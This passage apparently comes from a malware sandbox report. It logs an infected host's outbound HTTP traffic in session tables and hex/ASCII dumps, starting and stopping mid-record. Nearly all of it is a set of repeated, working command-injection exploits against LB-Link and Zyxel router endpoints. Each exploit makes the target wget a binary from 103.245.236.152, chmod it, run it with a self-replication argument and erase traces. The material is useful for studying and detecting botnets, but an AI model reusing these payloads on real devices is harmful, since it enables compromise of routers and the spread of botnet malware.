                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:33.150578022 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:34.462472916 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:37.086132050 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8183192.168.2.235441423.243.127.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350186110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8184192.168.2.235765862.152.192.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350208998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8185192.168.2.2352364126.154.101.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350225925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8186192.168.2.2338756106.252.133.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350280046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8187192.168.2.235166625.44.49.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350316048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8188192.168.2.2351798150.167.252.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350347042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8189192.168.2.234177289.188.218.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350372076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8190192.168.2.234909649.60.132.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350403070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8191192.168.2.2335672129.152.86.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350440979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8192192.168.2.2336288186.80.29.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350462914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8193192.168.2.234590283.252.175.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350490093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8194192.168.2.236048698.84.148.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350521088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8195192.168.2.2348486158.216.11.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350555897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8196192.168.2.2356952201.241.251.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350595951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8197192.168.2.2333606139.217.170.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350624084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8198192.168.2.2336682107.123.166.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350653887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8199192.168.2.2335498124.117.70.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350707054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8200192.168.2.235223897.37.133.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350742102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8201192.168.2.2342026128.224.47.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350756884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8202192.168.2.2354680110.236.120.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350811005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8203192.168.2.234889634.207.170.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350840092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8204192.168.2.2351322105.63.195.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350899935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8205192.168.2.233852831.197.173.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350922108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8206192.168.2.2335218117.174.237.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350963116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8207192.168.2.23544621.188.85.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350977898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8208192.168.2.2356866161.186.237.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.350992918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8209192.168.2.2342880155.53.216.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351038933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8210192.168.2.2338886151.152.74.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351068020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8211192.168.2.2332932148.44.120.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351075888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8212192.168.2.2343098113.173.181.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351139069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8213192.168.2.233791487.111.174.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351159096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8214192.168.2.2333750155.203.10.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351181030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8215192.168.2.2347558197.251.172.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351210117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8216192.168.2.2350204165.142.129.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351223946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8217192.168.2.2343210221.12.176.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351277113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8218192.168.2.2343490124.157.185.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351284027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8219192.168.2.233449639.173.143.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351321936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8220192.168.2.233866623.201.114.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351347923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8221192.168.2.2340580209.143.3.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351350069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8222192.168.2.2335752194.246.127.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351387978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8223192.168.2.2358738120.177.27.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351418972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8224192.168.2.233634263.68.197.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351423025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8225192.168.2.2333916210.24.213.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351440907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8226192.168.2.233561676.62.231.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351471901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8227192.168.2.235279449.63.231.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351489067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8228192.168.2.235537870.46.51.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351496935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8229192.168.2.235671487.242.249.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351528883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8230192.168.2.235659068.171.155.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351588964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8231192.168.2.2344640179.230.129.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351615906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8232192.168.2.2357100180.94.177.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351634026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8233192.168.2.2347778162.15.42.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351664066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8234192.168.2.2357944196.65.149.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351685047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8235192.168.2.235851286.90.146.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351711988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8236192.168.2.2341522143.61.224.182443
                                          TimestampBytes transferredDirectionData
